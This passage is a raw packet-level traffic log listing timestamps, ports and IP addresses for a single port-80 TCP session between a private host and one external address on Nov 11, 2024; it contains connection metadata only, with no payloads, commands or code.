Nov 11, 2024 01:14:23.145519018 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.145535946 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.145549059 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.145560980 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.145562887 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.145571947 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.145581007 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.145585060 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.145591974 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.145596981 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.145606995 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.145611048 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.145618916 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.145629883 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.145636082 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.145639896 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.145662069 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.145690918 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.145893097 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.145947933 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.145948887 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.145992994 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.146035910 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.146084070 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.146107912 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.146121025 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.146156073 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.146261930 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.146272898 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.146284103 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.146296978 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.146306992 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.146308899 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.146321058 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.146326065 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.146332979 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.146342993 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.146353960 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.146359921 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.146367073 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.146378994 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.146385908 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.146390915 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.146404028 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.146404028 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.146420956 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.146444082 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.146904945 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.146950960 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.146962881 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.146974087 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.146982908 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.146995068 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.147006035 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.147006989 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.147028923 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.147053957 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.147063017 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.147067070 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.147078991 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.147089958 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.147102118 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.147105932 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.147114038 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.147603035 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.147631884 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.147650003 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.147654057 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.147694111 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.147730112 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.147742033 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.147753000 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.147774935 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.147805929 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.147829056 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.147840023 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.147850990 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.147862911 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.147871017 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.147874117 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.147900105 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.147918940 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.148067951 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.148085117 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.148096085 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.148112059 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.148117065 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.148124933 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.148128986 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.148137093 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.148149014 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.148159981 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.148164034 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.148171902 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.148175001 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.148184061 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.148195982 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.148206949 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.148212910 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.148217916 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.148230076 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.148232937 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.148242950 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.148251057 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.148256063 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.148267984 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.148277044 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.148279905 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.148294926 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.148325920 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.148577929 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.148590088 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.148601055 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.148612022 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.148622036 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.148624897 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.148633957 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.148638010 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.148647070 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.148672104 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.148696899 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.148726940 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.148740053 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.148756981 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.148767948 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.148771048 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.148782969 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.148786068 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.148796082 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.148807049 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.148809910 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.148821115 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.148833036 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.148833036 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.148838997 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.148849964 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.148855925 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.148866892 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.148884058 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.148890018 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.148899078 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.148909092 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.148911953 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.148921013 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.148926020 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.148940086 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.148948908 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.148950100 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.148968935 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.148978949 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.148982048 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.148994923 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.149003029 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.149012089 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.149023056 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.149029016 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.149034023 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.149045944 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.149055958 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.149056911 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.149069071 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.149075985 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.149081945 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.149095058 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.149094105 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.149105072 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.149108887 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.149121046 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.149132013 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.149136066 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.149149895 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.149163008 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.149167061 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.149173975 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.149174929 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.149187088 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.149199009 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.149202108 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.149211884 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.149224043 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.149235010 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.149235964 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.149241924 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.149250984 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.149255037 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.149275064 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.149281025 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.149287939 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.149300098 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.149307966 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.149312019 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.149324894 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.149327040 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.149336100 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.149348021 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.149358988 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.149369955 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.149369955 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.149377108 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.149384975 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.149396896 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.149399996 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.149420023 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.149435043 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.149945021 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.149956942 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.149966955 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.149979115 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.149991035 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.149992943 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150005102 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150016069 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.150017023 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150028944 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150034904 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.150042057 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150053024 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150058031 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150068998 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150075912 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.150082111 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150099993 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150104046 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.150111914 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150124073 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150126934 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.150135040 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150139093 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.150146961 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150158882 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150170088 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150176048 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.150181055 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150191069 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.150192976 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150204897 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150208950 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.150211096 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150218010 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150223017 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150233030 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150242090 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.150252104 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150255919 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.150269985 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150284052 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150288105 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.150295973 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150306940 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150317907 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150321960 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.150330067 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150342941 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150353909 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.150357962 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150365114 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.150377035 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150383949 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.150389910 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150401115 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150410891 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150412083 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.150424004 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150435925 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150446892 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150458097 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150466919 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.150471926 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150475979 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.150491953 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150496960 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.150506020 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150516987 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150528908 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150532007 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.150543928 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.150547981 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150559902 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150568008 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.150572062 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150590897 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150593042 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.150603056 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150614977 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150621891 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.150631905 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150640965 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.150644064 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150655985 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150666952 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150670052 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.150679111 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150682926 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.150691986 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150703907 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150713921 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150718927 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.150727034 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150758028 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.150758028 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.150760889 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150773048 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150778055 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.150784969 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150796890 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150806904 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.150818110 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150834084 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150845051 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.150845051 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150852919 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.150887966 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.150902033 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150916100 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150924921 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150937080 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150947094 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.150947094 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150959015 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150965929 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.150970936 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150983095 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.150995016 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.151005983 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.151016951 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.151016951 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.151016951 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.151035070 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.151036978 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.151046991 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.151058912 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.151070118 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.151082993 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.151093006 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.151093960 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.151099920 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.151104927 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.151115894 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.151128054 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.151139021 CET	80	49762	185.215.113.16	192.168.2.4
